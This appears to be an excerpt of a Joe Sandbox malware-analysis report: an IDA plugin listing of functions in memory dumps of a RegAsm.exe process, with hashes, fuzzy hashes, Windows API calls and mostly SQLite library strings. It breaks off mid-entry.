                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: d6982fd4200109579bcf906d8ee94d8050fe0fa2bccb839d7e97c6e67fed9c75
                                                                                                                                                                                                • Instruction ID: 81f58cded71fcfcc31c9d2deca3dafeb8a0f58bc21f605ccd26038b46dcd7a7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6982fd4200109579bcf906d8ee94d8050fe0fa2bccb839d7e97c6e67fed9c75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7131AD656007A146D7218F38D8617E7BBE09F61313F08846EE9C5C7781E726F492C3E2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • error in tokenizer constructor, xrefs: 1B5B7F92
                                                                                                                                                                                                • no such tokenizer: %s, xrefs: 1B5B7F1B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                                                                                                                                                                • API String ID: 0-815501780
                                                                                                                                                                                                • Opcode ID: 209d9a780f6860f0d3496afa61d2425dae8c97c43a789f6d9df45af7f0793b10
                                                                                                                                                                                                • Instruction ID: 452940ca3ce8b84d5236a912a21028e24e7325c0c4ea99e68429710c0f559b7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 209d9a780f6860f0d3496afa61d2425dae8c97c43a789f6d9df45af7f0793b10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31CF767002558FDB20CF19D880BAAB7E5EF84765F18066DE988DB300E332E805CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • second argument to nth_value must be a positive integer, xrefs: 1B49F0C4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: second argument to nth_value must be a positive integer
                                                                                                                                                                                                • API String ID: 0-2620530100
                                                                                                                                                                                                • Opcode ID: a62466d241008b5ee2b1822ab2880d3aff758ba8123644f38b9340288f37f980
                                                                                                                                                                                                • Instruction ID: e87cbb44719fcdbee3ce07928388a09cfeb2df40a82ddfe0b263c02237081131
                                                                                                                                                                                                • Opcode Fuzzy Hash: a62466d241008b5ee2b1822ab2880d3aff758ba8123644f38b9340288f37f980
                                                                                                                                                                                                • Instruction Fuzzy Hash: 71313F76D003129BDF10BF24FC427DA7BA4BF48711F04C659EC95A6250F722FD548692
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4D52FC
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4D5301
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D52F2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 48f6f74a4d2aef432c5279a2668e49b4036353f1499a8661a6cba69d863b6cbb
                                                                                                                                                                                                • Instruction ID: 751604201620158990d96f3aa47c3e20d274100bfe17a813af9eda4e0c8681f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 48f6f74a4d2aef432c5279a2668e49b4036353f1499a8661a6cba69d863b6cbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: DD11547B70020067CF105B59FC41CDBBFA5DFC52B2F094565FA4856222E722E92197F2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0040EECB
                                                                                                                                                                                                • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EEF6
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040EF3C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorInformationLastLogicalProcessorwsprintf
                                                                                                                                                                                                • String ID: DUB
                                                                                                                                                                                                • API String ID: 4210301552-3620500899
                                                                                                                                                                                                • Opcode ID: 5972859eec071abbba46104b99739d47d3a8578b111994b832e41ceae0e04b5f
                                                                                                                                                                                                • Instruction ID: 741c8af5bfff6a8fdddd2decec33d16abe5f3a752fb6206f2dd4af5b1af627c4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5972859eec071abbba46104b99739d47d3a8578b111994b832e41ceae0e04b5f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64214472E0011AFFCB209F96E8804AEB7B9EB44704B5444BFE105F2281DB384E559E99
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4DFE7D
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4DFE82
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4DFDE6, 1B4DFE61
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-2528248365
                                                                                                                                                                                                • Opcode ID: 3a2b446b268c747bcdcf77295fc8f915afb099dff3545264a742d39d033535b7
                                                                                                                                                                                                • Instruction ID: 6e566dda6bdeac9aeefe78fc1a8132a31e3c915f832103471dde7cc1033dd043
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a2b446b268c747bcdcf77295fc8f915afb099dff3545264a742d39d033535b7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F311CA85143818AD3249F24C4143A2BB61BF25749FA4C5CDE4898F753E37BC4C7DBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s%s
                                                                                                                                                                                                • API String ID: 0-3252725368
                                                                                                                                                                                                • Opcode ID: d79e4c29c31064142a0eed524e1b596a89c489a83c84814bc1c21f4be079ce75
                                                                                                                                                                                                • Instruction ID: 23704560fe183b74713403e8909d2c0b0c2db54284c5e6792c7e5431f42ad383
                                                                                                                                                                                                • Opcode Fuzzy Hash: d79e4c29c31064142a0eed524e1b596a89c489a83c84814bc1c21f4be079ce75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78117F7A9002219BDB015F69DC88B9A37ACFFD026AF04452DEDD8E6204D739D958C7B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: WITHOUT ROWID$CREATE TABLE %Q.'%q_%q'(%s)%s$fts5: error creating shadow table %q_%s: %s
                                                                                                                                                                                                • API String ID: 0-1971204597
                                                                                                                                                                                                • Opcode ID: 9f67dbcce53cabc786fef50f1f472ab2bd80edf0c31663d8aaebfb4549811af8
                                                                                                                                                                                                • Instruction ID: 2975bb3a717f19ec2858660b689310766a4bb83b82802d371bb8804d869186e2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f67dbcce53cabc786fef50f1f472ab2bd80edf0c31663d8aaebfb4549811af8
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1119071600111AFEB054F68DD88AAABBB9FBD425AF04452CFD89D6101D731C858DBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A2406
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A240B
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A23FC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 50bd7c0e2729e4750af3798a9a344ccf2a2643d64478c9f84da9715db7a4c6e9
                                                                                                                                                                                                • Instruction ID: 0745cf68d33fe4447346b566fbcfb534ff86791a1350c2677f507cc55dfce6ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 50bd7c0e2729e4750af3798a9a344ccf2a2643d64478c9f84da9715db7a4c6e9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 88116A752042129FD718DF28DC80E9ABBA4BFA9304F51849CE5469B392D731E886DB90
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • JSON path error near '%q', xrefs: 1B541F92
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: JSON path error near '%q'
                                                                                                                                                                                                • API String ID: 0-481711382
                                                                                                                                                                                                • Opcode ID: 17ae739514cbd295309a7757e9541cfcb5fbe7ff625762630ee159fbcc5d1177
                                                                                                                                                                                                • Instruction ID: c8ce1d5d1bc728486c6ee857ae0311d689373697473700ffcb1285390791b1c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 17ae739514cbd295309a7757e9541cfcb5fbe7ff625762630ee159fbcc5d1177
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C0104B27092517EEB209B549C01BDB7FD4DF81330F20462CF995962D4EB71A80293A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4A1E59
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4A1E63
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4A1E53
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 312aafddc11906cb73772f3ad06ea337a13c0d1cf8cec54f1d7599822b415565
                                                                                                                                                                                                • Instruction ID: aefe3f83b7944b50cb090b65683f7505255b1798cd41c35cbcb87624ecfd3d46
                                                                                                                                                                                                • Opcode Fuzzy Hash: 312aafddc11906cb73772f3ad06ea337a13c0d1cf8cec54f1d7599822b415565
                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11E374708550AFD718DF3AD844AD7BBB8AF77A95F048458E046CB322C335E946C7A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B4BF105
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                • API String ID: 0-2312637080
                                                                                                                                                                                                • Opcode ID: c9256acf03246297987d00e1213585bbec16792947a095f4731d95834f702191
                                                                                                                                                                                                • Instruction ID: 3c68d6e88d04a30e58e3a5ae7c698245a52bc600d237487125563e14aa4a3b39
                                                                                                                                                                                                • Opcode Fuzzy Hash: c9256acf03246297987d00e1213585bbec16792947a095f4731d95834f702191
                                                                                                                                                                                                • Instruction Fuzzy Hash: 910192367042415ED721976EFC40FE7BBE8EBC8621F05486EF6ADC2201D361AC859371
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B4C0D87
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
                                                                                                                                                                                                • API String ID: 0-2312637080
                                                                                                                                                                                                • Opcode ID: 238cbf095fcc3c7ee35542c7d4f63334d10de8149436c487bf6cf6afa710a7b9
                                                                                                                                                                                                • Instruction ID: 3e319634e219efef1d268061b22d2bacc46f76b7f84aa34c666d67bc94e3d04d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 238cbf095fcc3c7ee35542c7d4f63334d10de8149436c487bf6cf6afa710a7b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2901697A604300AFE7109A5AEC81F93BBE9EB8CB24F04845DF68DD7240D772BC468761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B49EFB0
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B49EFB5
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B49EFA6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: ef2f7a0191d5d3e034b7a61ec197409021b1506d580d6d0c018c1d5db097bd67
                                                                                                                                                                                                • Instruction ID: f49847df54a156f08ff18c0116aee6d34d7bf62586724f0abd64d235f0b884bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef2f7a0191d5d3e034b7a61ec197409021b1506d580d6d0c018c1d5db097bd67
                                                                                                                                                                                                • Instruction Fuzzy Hash: B801F5B1A01621AFD7148F08EC48BCA7FA5AFE5305F05811CE9885B344D331E84DC7D6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s_stat
                                                                                                                                                                                                • API String ID: 0-920702477
                                                                                                                                                                                                • Opcode ID: 381a03aeb1040ea2c310fbcda0a2122a9f76eba28649432fde16e4d74a4c131d
                                                                                                                                                                                                • Instruction ID: 64fe83028aad55e65503f06eacd0cc4d0400e3b42a1abafeac0454d1eee82337
                                                                                                                                                                                                • Opcode Fuzzy Hash: 381a03aeb1040ea2c310fbcda0a2122a9f76eba28649432fde16e4d74a4c131d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F02762B056523BEB00467DBC81BC6EFE9EF48160F148629E40CA2108C322BC915391
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1B4B7F76
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                                                                                                                                                                • API String ID: 0-3072645960
                                                                                                                                                                                                • Opcode ID: 528211fb9997cb6736ed4ebc6099194a5a15897aa81dcf0abcfbd3849023b023
                                                                                                                                                                                                • Instruction ID: 1c99276f709505c2d37afc88b01f4411d4f31bab7222c6f46b73b73d30c601de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 528211fb9997cb6736ed4ebc6099194a5a15897aa81dcf0abcfbd3849023b023
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F02B36B4430296DB005F19FC02BC97BD5AFD5311F198129F94496240F760E88583B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00410095,00000000), ref: 0040FCA2
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00410095,00000000), ref: 0040FCA9
                                                                                                                                                                                                • wsprintfW.USER32 ref: 0040FCBA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                • String ID: %hs
                                                                                                                                                                                                • API String ID: 659108358-2783943728
                                                                                                                                                                                                • Opcode ID: d5ea7713d317f2ebb614152b3c5bf60322d04d2ff2908d104b3bc2f949a7d368
                                                                                                                                                                                                • Instruction ID: bcd4547f941fe6a092a856821e4b12fc33d1e40d09299ab1671c3f7be8122737
                                                                                                                                                                                                • Opcode Fuzzy Hash: d5ea7713d317f2ebb614152b3c5bf60322d04d2ff2908d104b3bc2f949a7d368
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BD05E317412287BC62027A4BC0AFAA7E28EB15AE2F400030FA09C6961CAA1441147EA
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • cannot open file, xrefs: 1B596B59
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B596B5E
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B596B50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-1799306995
                                                                                                                                                                                                • Opcode ID: f805dd2869ff7c7f3122d1c49b338d94d86540c3193ca76919eb019a9f0d38ac
                                                                                                                                                                                                • Instruction ID: 19077a90907a0d2c779c7da9ff2770040ec3e39fa5f470ef0ada9ee995ec55c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: f805dd2869ff7c7f3122d1c49b338d94d86540c3193ca76919eb019a9f0d38ac
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DB092DB700280B6DA043B54CE03FD72C316778682F81CAA8B149392A6E296C0908372
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5CC1F9
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5CC1FE
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5CC1F0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 880f186eb7be347389632487ce66260c1fafa307c46c6555f1f6b611240e593a
                                                                                                                                                                                                • Instruction ID: 3df7045dc88c3863bdddc41a1dba3bbe055dccae3099e355e2a5b7fbb3f35e01
                                                                                                                                                                                                • Opcode Fuzzy Hash: 880f186eb7be347389632487ce66260c1fafa307c46c6555f1f6b611240e593a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FB092EA710A48F6DF042344CE83FDA6C319BF8347F81C6ACB2556D2A6E26580506372
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 195cf5c488fa45a5daa598f3ed4972b408fda929c477fb934d9ebc7a08371bd8
                                                                                                                                                                                                • Instruction ID: f65a33fc144a075fde1485f9751cfa90a9d96364105bfeaf56f0298d6b41a4fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 195cf5c488fa45a5daa598f3ed4972b408fda929c477fb934d9ebc7a08371bd8
                                                                                                                                                                                                • Instruction Fuzzy Hash: C45136B1A043D24AF7228F759C457DAFFF49F45312F084AA9E8C58B362E369D488C361
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c074a326e871b636ae283752056f8f4c812119a7c12a6f9dc4f7d6b2f0ec5765
                                                                                                                                                                                                • Instruction ID: 2e1c52e8d61dd2081eafdbeb254c51a3b14ae1b3bfb222f79b3c8caaa88ea37a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c074a326e871b636ae283752056f8f4c812119a7c12a6f9dc4f7d6b2f0ec5765
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141EF366016019FD714CF18DA80A96F7E1FF84324F18856EEA8687B62D772FC51CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 64f15566ddab25c787ed05cf10e2b1c50c44e9ad38fae7b2066188378aa964c6
                                                                                                                                                                                                • Instruction ID: 9ebe7e5129aef928b5f9404b7b1df8d7285a44e8bcc413cdd99378d1ee4e83c1
